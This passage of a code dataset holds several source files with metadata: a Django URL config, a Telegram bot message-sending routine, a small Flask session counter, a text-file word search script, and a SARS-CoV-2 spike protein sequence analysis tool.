path('noticeapi/', NoticeAPI.as_view(), name='noticeapi'),\n path('complaintapi/', ComplaintAPI.as_view(), name='complaintapi'),\n]", "repo_name": "Keshav-Agarwal/HousingSociety", "sub_path": "backend/housingsocietyapi/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "views.ResidentAPI.as_view", "line_number": 6, "usage_type": "call"}, {"api_name": "views.ResidentAPI", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ResidentAPI.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ResidentAPI", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.BillAPI.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "views.BillAPI", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.BillAPI.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.BillAPI", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "views.NoticeAPI.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.NoticeAPI", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ComplaintAPI.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "views.ComplaintAPI", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "9181057671", "text": "import json\nimport time\nimport sys\nimport re\n\nfrom Foos import Actions, Dialogs, BotsFoos\nfrom Core import HTTPLL, Unreloaded, Error, Manager\nfrom LowLevel import DBs\nfrom Utils import Logger as Log, Utils\n\n\nrecursivity = {}\n\n\n# ToDo: Split this function in more methods\ndef send(infos, sezione,\n antispam=True,\n to_id=None,\n special_name=None,\n special_group_name=None,\n special_user_name=None,\n no_log=False,\n special_token=None,\n special_bid=None,\n special_text=None,\n ignore_specials=False,\n recorsivity=None,\n add=None,\n parse=\"markdown\"):\n text = \"\"\n try:\n quote = False\n inter_bot_id = None\n sezione_inter = None\n quitta = False\n no_prew = False\n\n if sezione:\n infos.trigger = sezione\n else:\n infos.trigger = \"\"\n\n if recorsivity:\n if recorsivity > 3:\n return\n else:\n recorsivity += 1\n else:\n recorsivity = 1\n\n if not to_id:\n to_id = infos.cid\n\n if special_group_name:\n infos.name = special_group_name\n if special_user_name:\n infos.user.name = special_user_name\n\n if special_token:\n infos.token = special_token\n\n if special_bid:\n infos.bid = special_bid\n\n if not special_text:\n\n text = Dialogs.get_text(infos, sezione)\n if add:\n try:\n text += add\n except Exception:\n pass\n if not text:\n return False\n\n if text.lower() == \"skip\" or text.lower() == \"+skip+\":\n return True\n\n if antispam:\n if Unreloaded.antispam(infos):\n return True\n\n else:\n text = special_text\n\n text = Dialogs.section_replacer(infos, text)\n\n if infos.api:\n return text\n\n if \"[warn]\" in text:\n return BotsFoos.warn(infos)\n\n if \"[unwarn]\" in text:\n return BotsFoos.unwarn(infos)\n\n if \"+exe+\" in text:\n infos.master_message(\"Master, +exe+ 
is deprecated:\\n`\" + text + \"`\\nIn `\" + sezione + \"`\",\n parse_mode=\"markdown\")\n Log.a(\"[%s] U: %s %s\" % (infos.bot_name, infos.user.username, sezione))\n return\n\n if not ignore_specials:\n text = Utils.replacer(infos, text)\n text = Actions.action(infos, text, sezione)\n if not text:\n return\n\n if type(text) is bool:\n return\n\n if \"[noprew]\" in text:\n text = text.replace(\"[noprew]\", \"\")\n no_prew = True\n\n if \"[quote]\" in text:\n text = text.replace(\"[quote]\", \"\")\n quote = infos.user.message.id\n\n if \"[quote2]\" in text:\n text = text.replace(\"[quote2]\", \"\")\n if infos.to_user:\n quote = infos.to_user.message.id\n\n if \"[quit]\" in text:\n text = text.replace(\"[quit]\", \"\")\n quitta = True\n\n match = re.search(\"\\[(\\d+)\\]\", text)\n if match:\n if int(match.group(1)) not in Manager.get_bots_id():\n return HTTPLL.sendMessage(infos.token, Manager.get_prop_id(infos.token),\n \"%s non è un ID valido.\" % match.group(1))\n\n result = text.split(\"[\" + match.group(1) + \"]\")\n\n trigs = json.loads(open(\"Files/bot_files/%s/%s\" % (match.group(1), \"triggers.json\")).read())\n\n if \"autorizzati\" not in trigs:\n HTTPLL.sendMessage(infos.token, infos.prop_id, \"%s non ti ha autorizzato.\" % match.group(1))\n\n elif infos.bid not in trigs[\"autorizzati\"]:\n HTTPLL.sendMessage(infos.token, infos.prop_id, \"%s non ti ha autorizzato.\" % match.group(1))\n # infos.reply(\"Autorizzati: %s\" % )\n else:\n inter_bot_id = int(match.group(1))\n sezione_inter = result[1]\n\n text = result[0]\n\n if special_name:\n text = text.replace(\"+newuser+\", special_name)\n\n if not text:\n return\n\n text, kb = Utils.get_keyboard(text)\n if text == \"\":\n return\n\n try:\n caption = None\n if \"+stk+\" in text:\n stk = text.split(\"()\")[1]\n HTTPLL.sendSticker(infos.token, chat_id=to_id, sticker=stk)\n return True\n\n if \"+pht+\" in text:\n elems = text.split(\"()\")\n pht = elems[1]\n if len(elems) == 3:\n caption = elems[2]\n HTTPLL.sendChatAction(infos.token, to_id, 'upload_photo')\n time.sleep(0.3)\n HTTPLL.sendPhoto(infos.token, chat_id=to_id, photo=pht, caption=caption, reply_to_message_id=quote)\n return True\n\n if \"+doc+\" in text:\n elems = text.split(\"()\")\n doc = elems[1]\n if len(elems) == 3:\n caption = elems[2]\n HTTPLL.sendDocument(infos.token, to_id, doc, caption=caption, reply_to_message_id=quote)\n return True\n\n if \"+aud+\" in text or \"+voi+\" in text:\n aud = text.split(\"()\")[1]\n HTTPLL.sendVoice(infos.token, to_id, aud, reply_to_message_id=quote)\n return True\n\n if \"+vid+\" in text:\n elems = text.split(\"()\")\n vid = elems[1]\n if len(elems) == 3:\n caption = elems[2]\n HTTPLL.sendVideo(infos.token, to_id, vid, caption=caption, reply_to_message_id=quote)\n return True\n except Exception as err:\n Log.w(\"Errore nell'invio del media: %s\" % err)\n return False\n\n text = Utils.escape_markdown(text)\n\n text = text.replace(\"\", \"*\").replace(\"\", \"*\")\n text = text.replace(\"\", \"`\").replace(\"\", \"`\")\n text = text.replace(\"\", \"_\").replace(\"\", \"_\")\n\n text = Utils.link_elab(text, infos)\n\n text = re.sub(\"\\/\\w+\\\\_\\w+\", \"$&\", text).replace(\"\\\\\\\\_\", \"\\\\_\")\n\n match = re.search(\"\\B.+\\B\", text)\n if match:\n iquote = \"[%s](tg://user?id=%s)\" % (str(match.group(0))\n .replace(\"\", \"\").replace(\"\", \"\"), infos.user.uid)\n text = re.sub(\"\\B.+\\B\", iquote, text)\n\n result = re.finditer(re.compile(r\"\\*.+?\\*\"), text)\n if result:\n for res in result:\n text = 
text.replace(res.group(), res.group(0).replace(\"\\_\", \"_\"))\n\n HTTPLL.sendChatAction(infos.token, to_id, 'typing')\n HTTPLL.sendMessage(infos.token, chat_id=to_id, text=text, parse_mode=parse,\n disable_web_page_preview=no_prew, reply_to_message_id=quote, reply_markup=kb)\n\n if not no_log:\n Log.a(\"%s <- %s -> [%s]\" % (infos.bid, infos.user.uid, sezione))\n\n if infos.chat_private:\n return\n if quitta:\n HTTPLL.leaveChat(infos.token, infos.cid)\n if inter_bot_id and sezione_inter:\n try:\n send(infos, sezione_inter, special_token=Manager.get_token_from_bot_id(inter_bot_id),\n antispam=False,\n special_bid=inter_bot_id,\n recorsivity=recorsivity)\n except Exception:\n pass\n return True\n\n except Error.Unauthorized:\n if not to_id:\n Log.e(\"Qualcosa non va, l'ID era None...\")\n return \"ERR\"\n DBs.remove_id(infos.entity, to_id)\n return \"ERR\"\n\n except Error.BadRequest as err:\n if \"chat not found\" in str(err):\n return\n\n if \"group chat was migrated\" in str(err):\n DBs.remove_id(infos.entity, to_id)\n return \"ERR\"\n\n Log.e(\"Bot %s -> BadRequest (%s)\" % (infos.bot_name, err))\n\n if infos.user.is_owner:\n infos.reply(\"Master non sono riuscita ad inviare questo messaggio:\\n\"\n \"`%s`\\nSegnalalo a @Kaikyu o controlla la formattazione.\" % text, markdown=True)\n return \"ERR\"\n\n except Error.NotEnoughtRights:\n DBs.remove_id(infos.entity, to_id)\n return \"ERR\"\n\n except Exception as err:\n msg = \"Ho trovato un errore: riga {} {} {}\".format(sys.exc_info()[-1].tb_lineno, type(err).__name__, err)\n HTTPLL.sendMessage(infos.token, infos.prop_id, msg)\n Log.e(msg)\n if \"can't parse\" in str(err).lower():\n # noinspection PyTypeChecker\n send(infos, \"\",\n to_id=Manager.get_prop_id(infos.token),\n special_text=\"C'è un problema con la formattazione del messaggio:\\n\\n%s\" % text,\n parse=None,\n antispam=False)\n return \"ERR\"\n", "repo_name": "KaikyuLotus/kitsu-maker-bot", "sub_path": "Core/Dialoger.py", "file_name": "Dialoger.py", "file_ext": "py", "file_size_in_byte": 9061, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Foos.Dialogs.get_text", "line_number": 67, "usage_type": "call"}, {"api_name": "Foos.Dialogs", "line_number": 67, "usage_type": "name"}, {"api_name": "Core.Unreloaded.antispam", "line_number": 80, "usage_type": "call"}, {"api_name": "Core.Unreloaded", "line_number": 80, "usage_type": "name"}, {"api_name": "Foos.Dialogs.section_replacer", "line_number": 86, "usage_type": "call"}, {"api_name": "Foos.Dialogs", "line_number": 86, "usage_type": "name"}, {"api_name": "Foos.BotsFoos.warn", "line_number": 92, "usage_type": "call"}, {"api_name": "Foos.BotsFoos", "line_number": 92, "usage_type": "name"}, {"api_name": "Foos.BotsFoos.unwarn", "line_number": 95, "usage_type": "call"}, {"api_name": "Foos.BotsFoos", "line_number": 95, "usage_type": "name"}, {"api_name": "Utils.Logger.a", "line_number": 100, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 100, "usage_type": "name"}, {"api_name": "Utils.Utils.replacer", "line_number": 104, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 104, "usage_type": "name"}, {"api_name": "Foos.Actions.action", "line_number": 105, "usage_type": "call"}, {"api_name": "Foos.Actions", "line_number": 105, "usage_type": "name"}, {"api_name": "re.search", "line_number": 129, "usage_type": "call"}, {"api_name": "Core.Manager.get_bots_id", "line_number": 131, "usage_type": "call"}, {"api_name": 
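The <q>...</q> handling in the send() function above turns a quoted name into a Telegram mention link. A standalone demo with assumed inputs:

import re

text = "Welcome <q>Alice</q>!"
uid = 12345
match = re.search(r"\B<q>.+</q>\B", text)
if match:
    mention = "[%s](tg://user?id=%s)" % (
        match.group(0).replace("<q>", "").replace("</q>", ""), uid)
    text = re.sub(r"\B<q>.+</q>\B", mention, text)
print(text)  # Welcome [Alice](tg://user?id=12345)!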
"Core.Manager", "line_number": 131, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 132, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 132, "usage_type": "name"}, {"api_name": "Core.Manager.get_prop_id", "line_number": 132, "usage_type": "call"}, {"api_name": "Core.Manager", "line_number": 132, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 137, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 140, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 140, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 143, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 143, "usage_type": "name"}, {"api_name": "Utils.Utils.get_keyboard", "line_number": 157, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 157, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendSticker", "line_number": 165, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 165, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendChatAction", "line_number": 173, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 173, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendPhoto", "line_number": 175, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 175, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendDocument", "line_number": 183, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 183, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendVoice", "line_number": 188, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 188, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendVideo", "line_number": 196, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 196, "usage_type": "name"}, {"api_name": "Utils.Logger.w", "line_number": 199, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 199, "usage_type": "name"}, {"api_name": "Utils.Utils.escape_markdown", "line_number": 202, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 202, "usage_type": "name"}, {"api_name": "Utils.Utils.link_elab", "line_number": 208, "usage_type": "call"}, {"api_name": "Utils.Utils", "line_number": 208, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 210, "usage_type": "call"}, {"api_name": "re.search", "line_number": 212, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 216, "usage_type": "call"}, {"api_name": "re.finditer", "line_number": 218, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 218, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendChatAction", "line_number": 223, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 223, "usage_type": "name"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 224, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 224, "usage_type": "name"}, {"api_name": "Utils.Logger.a", "line_number": 228, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 228, "usage_type": "name"}, {"api_name": "Core.HTTPLL.leaveChat", "line_number": 233, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 233, "usage_type": "name"}, {"api_name": "Core.Manager.get_token_from_bot_id", "line_number": 236, "usage_type": "call"}, {"api_name": "Core.Manager", "line_number": 236, "usage_type": "name"}, {"api_name": "Core.Error.Unauthorized", "line_number": 244, "usage_type": "attribute"}, 
{"api_name": "Core.Error", "line_number": 244, "usage_type": "name"}, {"api_name": "Utils.Logger.e", "line_number": 246, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 246, "usage_type": "name"}, {"api_name": "LowLevel.DBs.remove_id", "line_number": 248, "usage_type": "call"}, {"api_name": "LowLevel.DBs", "line_number": 248, "usage_type": "name"}, {"api_name": "Core.Error.BadRequest", "line_number": 251, "usage_type": "attribute"}, {"api_name": "Core.Error", "line_number": 251, "usage_type": "name"}, {"api_name": "LowLevel.DBs.remove_id", "line_number": 256, "usage_type": "call"}, {"api_name": "LowLevel.DBs", "line_number": 256, "usage_type": "name"}, {"api_name": "Utils.Logger.e", "line_number": 259, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 259, "usage_type": "name"}, {"api_name": "Core.Error.NotEnoughtRights", "line_number": 266, "usage_type": "attribute"}, {"api_name": "Core.Error", "line_number": 266, "usage_type": "name"}, {"api_name": "LowLevel.DBs.remove_id", "line_number": 267, "usage_type": "call"}, {"api_name": "LowLevel.DBs", "line_number": 267, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 271, "usage_type": "call"}, {"api_name": "Core.HTTPLL.sendMessage", "line_number": 272, "usage_type": "call"}, {"api_name": "Core.HTTPLL", "line_number": 272, "usage_type": "name"}, {"api_name": "Utils.Logger.e", "line_number": 273, "usage_type": "call"}, {"api_name": "Utils.Logger", "line_number": 273, "usage_type": "name"}, {"api_name": "Core.Manager.get_prop_id", "line_number": 277, "usage_type": "call"}, {"api_name": "Core.Manager", "line_number": 277, "usage_type": "name"}]} +{"seq_id": "11176631416", "text": "from flask import Flask, render_template, request, redirect, session # Import Flask to allow us to create our app\r\napp = Flask(__name__) # Create a new instance of the Flask class called \"app\"\r\napp.secret_key = 'secret' # set a secret key for security purposes\r\n\r\n@app.route('/')\r\ndef counter():\r\n if \"count\" not in session:\r\n session[\"count\"] = 0\r\n else:\r\n session['count'] += 1\r\n return render_template(\"index.html\")\r\n\r\n@app.route('/destroy_session')\r\ndef reset():\r\n session.clear()\r\n return redirect('/')\r\n\r\n@app.route('/signup')\r\ndef sign_up():\r\n return render_template(\"sign_up.html\")\r\n\r\n@app.route('/users', methods=['POST'])\r\ndef create_user():\r\n print(\"Got Post Info\")\r\n print(request.form)\r\n session['username'] = request.form['name']\r\n session['useremail'] = request.form['email']\r\n return redirect('/show')\r\n\r\n@app.route(\"/show\")\r\ndef show_user():\r\n return render_template('show.html', name_on_template=session['username'], email_on_template=session['useremail'])\r\n\r\nif __name__ == \"__main__\": # Ensure this file is being run directly and not from a different module\r\n app.run(debug=True) # Run the app in debug mode.\r\n\r\n", "repo_name": "cameotom/flask_session_counter", "sub_path": "counter/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 1193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 2, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 8, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 10, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 11, "usage_type": 
"call"}, {"api_name": "flask.session.clear", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 25, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "33946200981", "text": "#!python3\n#takes an input and searches the .txt files in the current directory for the word\n\nimport re, os\nfrom pathlib import Path\n\n# word to search for\nfind = input(\"What word would you like to find?\\n\")\n# gets current directory\np = Path.cwd()\n\n# for regex express\nsearchFor = re.compile(rf\"{find}\")\n\n# collects the files with the word\nfound = []\n\n# loops through the files\nfor file in p.glob('*.txt'):\n openFile = open(file,'r') #opens the file\n readFile = openFile.read() #reads the file\n mo = searchFor.search(readFile) #searchs the file for the word\n if mo != None : #if one instance found the file is added to found\n found.append(os.path.basename(file))\n\nfinal = \" \".join(found) #seprates the files by a space\nif len(found) > 0: #if a file was found\n print(f\"{find} was found in {final}\")\nelse: #if a file was not found\n print(f\"Sorry I couldn't find {find}\")\n\n\n", "repo_name": "jj1here/ATBS-Regex-Files", "sub_path": "search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 894, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path.cwd", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 10, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}]} +{"seq_id": "4761476444", "text": "'''\nXSPIKE: eXplore the SPIKE protein sequence in the SARS CoV-2 virus\n'''\n\nimport re\nfrom collections import Counter,defaultdict\nimport numpy as np\nimport random\nimport itertools as it\nfrom scipy import stats\n\nimport matplotlib.pyplot as plt\nimport argparse\n\nimport warnings\n\nfrom verbose import verbose as v\nimport readseq\nfrom spikevariants import SpikeVariants\nfrom hamming import hamming\nimport sequtil\nimport intlist\nimport wrapgen\nimport covid\nimport mutant\n\nfrom xspikeplots import circleplot,heatmap\n\ndef getargs():\n ap = argparse.ArgumentParser(description=__doc__)\n covid.corona_args(ap)\n paa = ap.add_argument\n paa(\"--pairs\",action=\"store_true\",\n help=\"analyze pairwise correlations\")\n paa(\"--allsites\",\n help=\"write fasta file with patterns involving 
/all/ sites\")\n    paa(\"--addsites\",\n        help=\"prepend this (comma-separated) list of sites to those being observed\")\n    paa(\"--sites\",type=int,default=50,\n        help=\"Number of highest-entropy sites to use\")\n    paa(\"--baseline\",choices=('Wuhan','BA.2','BA.5'), default=None,\n        help=\"Baseline sequences (default is Wuhan)\")\n    paa(\"--thresh\",type=int,default=2,\n        help=\"Only include patterns that appear at least this many times\")\n    paa(\"--entropysamples\",\"-E\",type=int,default=0,\n        help=\"For single-site entropy, subsample sequences for faster estimates\")\n    paa(\"--cvthresh\",type=int,default=3, ## should maybe just be hardcoded\n        help=\"Require this many sequences for each site in the pairwise correlation\")\n    paa(\"--plot\",action=\"store_true\",\n        help=\"make plots\")\n    paa(\"--writeplot\",\n        help=\"Write plots to file (instead of showing them on screen)\")\n    paa(\"--restrictsites\",\n        help=\"Consider only these sites (RBD, NTD, NTD+RBD, or comma-separated list)\")\n    paa(\"--nomutlist\",action=\"store_true\",\n        help=\"Don't make mutant list at end of lines\")\n    paa(\"--colormut\",\n        help=\"name of color mutation file (mutation_string,lineage_name) are 2nd,3rd columns\")\n    paa(\"--verbose\",\"-v\",action=\"count\",default=0,\n        help=\"verbose\")\n    args = ap.parse_args()\n    return args\n\ndef stripxs_orig(alist,blist,badchar='X'):\n    '''given a pair of lists (or strings), strip element n where\n    either alist[n]=='X' or blist[n]=='X'\n    return pair of tuples\n    '''\n    ab = [ (a,b) for a,b in zip(alist,blist)\n           if a!=badchar and b!=badchar ]\n    alist,blist = zip(*ab)\n    return alist,blist\n\ndef stripxs(alist,blist,badchar='X'):\n    '''given a pair of lists (or strings), strip element n\n    from both lists, if either alist[n]=='X' or blist[n]=='X'\n    return pair of tuples\n    '''\n    if badchar in alist or badchar in blist:\n        good = [i for i,(a,b) in enumerate(zip(alist,blist))\n                if not(a==badchar or b==badchar)]\n        alist = [alist[g] for g in good]\n        blist = [blist[g] for g in good]\n    return alist,blist\n\ndef contingency_table(alist,blist,thresh=3):\n    '''convert pair of lists (alist,blist) into a contingency table'''\n    alist,blist = stripxs(alist,blist)\n\n    acnt = Counter(alist); avals=list(acnt); A=len(acnt)\n    bcnt = Counter(blist); bvals=list(bcnt); B=len(bcnt)\n    table = np.empty((A,B),dtype=np.int32)\n\n    ab = Counter(zip(alist,blist))\n    for i,j in it.product(range(A),range(B)):\n        table[i,j] = ab[(avals[i],bvals[j])]\n\n    def minsum():\n        '''return the minimum sum along all the rows and columns'''\n        hsum = [np.sum(table[:,j]) for j in range(table.shape[1])]\n        vsum = [np.sum(table[i,:]) for i in range(table.shape[0])]\n        return min(hsum + vsum)\n\n    if thresh:\n        ## Stability (remove rows and columns whose sums are < thresh)\n        otable = table.copy()\n        while( minsum() < thresh ):\n            hok = [np.sum(table[:,j])>=thresh for j in range(table.shape[1])]\n            vok = [np.sum(table[i,:])>=thresh for i in range(table.shape[0])]\n            table = table[:,hok][vok,:]\n\n    ## Check that table is okay\n    hzero = [np.sum(table[:,j])==0 for j in range(table.shape[1])]\n    vzero = [np.sum(table[i,:])==0 for i in range(table.shape[0])]\n    if (np.any( hzero ) or np.any( vzero )): # or min(table.shape)<2 ):\n        ## This should never happen\n        v.print(\"warning: possible issues with contingency table\")\n        v.print(\"len a,b:\",len(alist),len(blist))\n        v.print(acnt)\n        v.print(bcnt)\n        v.print(ab)\n        v.print(hzero)\n        v.print(vzero)\n        v.print(\"Table:\")\n        v.print(table)\n        if thresh:\n            v.print(\"Original Table:\")\n            v.print(otable)\n\n    return table\n\ndef cramerv(table):\n    k = min(table.shape)\n    N = np.sum(table)\n    try:\n        chisq,_,_,_ = stats.chi2_contingency(table,lambda_='pearson')\n    except ValueError:\n        chisq=0\n        v.print(f\"Warning: in chisq k={k}, N={N}\")\n        v.print(\"Table:\\n\",table)\n\n    return np.sqrt(chisq/(N*max([1,(k-1)])))\n\ndef mutinfo(table):\n    return \\\n        stats.entropy(np.sum(table,axis=1)) + \\\n        stats.entropy(np.sum(table,axis=0)) - \\\n        stats.entropy(table.flatten())\n\n\n#############################################################\n\ndef filename_prepend(pre,file):\n    ## prepend a string to a file name; eg\n    ## \"pre\",\"file\" -> \"prefile\", but also\n    ## \"pre\",\"dir/file\" -> \"dir/prefile\"\n    if not file:\n        return file\n    return re.sub(r\"(.*/)?([^/]+)\",r\"\\1\"+pre+r\"\\2\",file)\n\ndef get_title(args,title=None):\n    if not title:\n        title = covid.get_title(args)\n    if args.restrictsites:\n        title = title + \" (\" + args.restrictsites + \" only)\"\n    return title\n\ndef pairwise(args,esites,charsatsite,mutname,title=None):\n    ''' Do pair-wise analysis to get cross-correlations and mutual entropies '''\n\n    title = get_title(args,title=title)\n\n    ## Make Cramer V table, and Mutual Info table\n    ne = len(esites)\n    cvtable = np.zeros((ne,ne))\n    mitable = np.zeros((ne,ne))\n    for i,j in it.product(range(ne),repeat=2):\n        ei,ej = esites[i],esites[j]\n        if ei <= ej:\n            table = contingency_table(charsatsite[ei],charsatsite[ej],\n                                      thresh=args.cvthresh)\n            cvtable[i,j] = cvtable[j,i] = cramerv(table)\n            mitable[i,j] = mitable[j,i] = mutinfo(table)\n\n            v.vvprint()\n            v.vvprint(\"ei,ej:\",ei+1,ej+1)\n            v.vvprint(\"cv:\",cvtable[i,j])\n            v.vvprint(\"mi:\",mitable[i,j])\n            v.vvprint(\"ei:\",Counter(charsatsite[ei]))\n            v.vvprint(\"ej:\",Counter(charsatsite[ej]))\n            v.vvprint(\"ij:\",Counter(zip(charsatsite[ei],\n                                        charsatsite[ej])))\n            v.vvprint(table)\n\n    ## Make plots of pairwise correlations\n    mnames = [mutname[e] for e in esites]\n    nodevalues = np.diag(mitable)\n    for plotter,pname in ((heatmap, \"hotmap\"),\n                          (circleplot,\"circle\")):\n        for stat,sname in ((mitable,\"mutinfo\"),\n                           (cvtable,\"cramerv\")):\n            nv = nodevalues if sname == \"cramerv\" else None\n            plotter(stat,mnames,nodevalues=nv)\n            plt.title(sname + \": \" + title)\n            plt.tight_layout()\n            if args.writeplot:\n                plt.savefig(filename_prepend(pname + \"-\" + sname + \"_\", args.writeplot))\n\n    #### Make table of correlated pairs\n    print(\"\\nMost highly correlated site-pairs for:\",title)\n    print(\"  cramerV mutInfo\")\n\n    lines=[]\n    for i,j in it.combinations(range(ne),2):\n        lines.append( (mnames[i],mnames[j],cvtable[i,j],mitable[i,j]) )\n    lines = sorted(lines, key=lambda w: (w[3],w[2]),reverse=True)\n    for line in lines[:15]:\n        print(\"%6s %6s %7.4f %7.4f\" % line)\n    print()\n    lines = sorted(lines[15:],key=lambda w: (w[2],w[3]),reverse=True)\n    for line in lines[:15]:\n        print(\"%6s %6s %7.4f %7.4f\" % line)\n\ndef main(args):\n\n    ## Get title for plots and tables\n    title = get_title(args)\n    v.print(\"Running xspike\",title)\n\n    allseqs = covid.read_seqfile(args)\n    allseqs = vcount(allseqs,\"All sequences:\")\n    allseqs = covid.filter_seqs_by_date(allseqs,args)\n    allseqs = vcount(allseqs,\"All sequences in date range:\")\n    allseqs = covid.fix_seqs(allseqs,args)\n    allseqs = list(allseqs)\n    seqs = covid.filter_seqs_by_pattern(allseqs,args)\n    seqs = vcount(seqs,\"Sequences after filtering by pattern:\")\n\n    seqs = list(seqs)\n    firstseq = seqs[0].seq\n    seqs = seqs[1:]\n\n    if len(seqs)==0:\n        raise RuntimeError(\"No sequences match pattern\")\n\n    N = len(seqs)\n    M = len(seqs[0].seq)\n\n    
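A worked toy example (made-up counts) of the two association measures defined above; it mirrors cramerv() and mutinfo() exactly.

import numpy as np
from scipy import stats

table = np.array([[30, 10],
                  [ 5, 25]])
chisq, _, _, _ = stats.chi2_contingency(table, lambda_='pearson')
N, k = table.sum(), min(table.shape)
cramer_v = np.sqrt(chisq / (N * (k - 1)))       # in [0, 1]; 1 = perfect association
mut_info = (stats.entropy(table.sum(axis=1))    # H(row)
            + stats.entropy(table.sum(axis=0))  # + H(col)
            - stats.entropy(table.flatten()))   # - H(row, col) = I(row; col), in nats
print(cramer_v, mut_info)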
print(f\"Evaluating {N} sequences of length {M}\")\n print(\"Sampled from %s to %s.\"\n % covid.range_of_dates(seqs))\n if args.dates:\n print(\"Specified Date Range:\",args.dates)\n\n #### SINGLE-SITE ENTROPY\n v.vprint(\"Single-site entropy...\",end=\"\")\n ## If args.entropysamples, then use subsampling of the sequences to estimate entropy\n sampleseqs = random.choices(seqs,k=args.entropysamples) if N>args.entropysamples>0 else seqs\n E = sequtil.chunked_entropy(sampleseqs)\n v.vprint(\"ok\")\n\n T = mutant.MutationManager(firstseq)\n\n ## Determine which sites will be employed\n esites = intlist.string_to_intlist(args.addsites)\n esites = list(dict.fromkeys(esites)) ## removes dups while maintaining order\n if args.sites:\n ndxtop = [n for n in np.argsort(E)[::-1]]\n if args.restrictsites:\n rsites = covid.spike_sites(args.restrictsites)\n rindices = T.indices_from_sitelist(rsites)\n ndxtop = [n for n in ndxtop if n in rindices]\n ## convert top indices back into top sites\n etopsites = [T.site_from_index(n) for n in 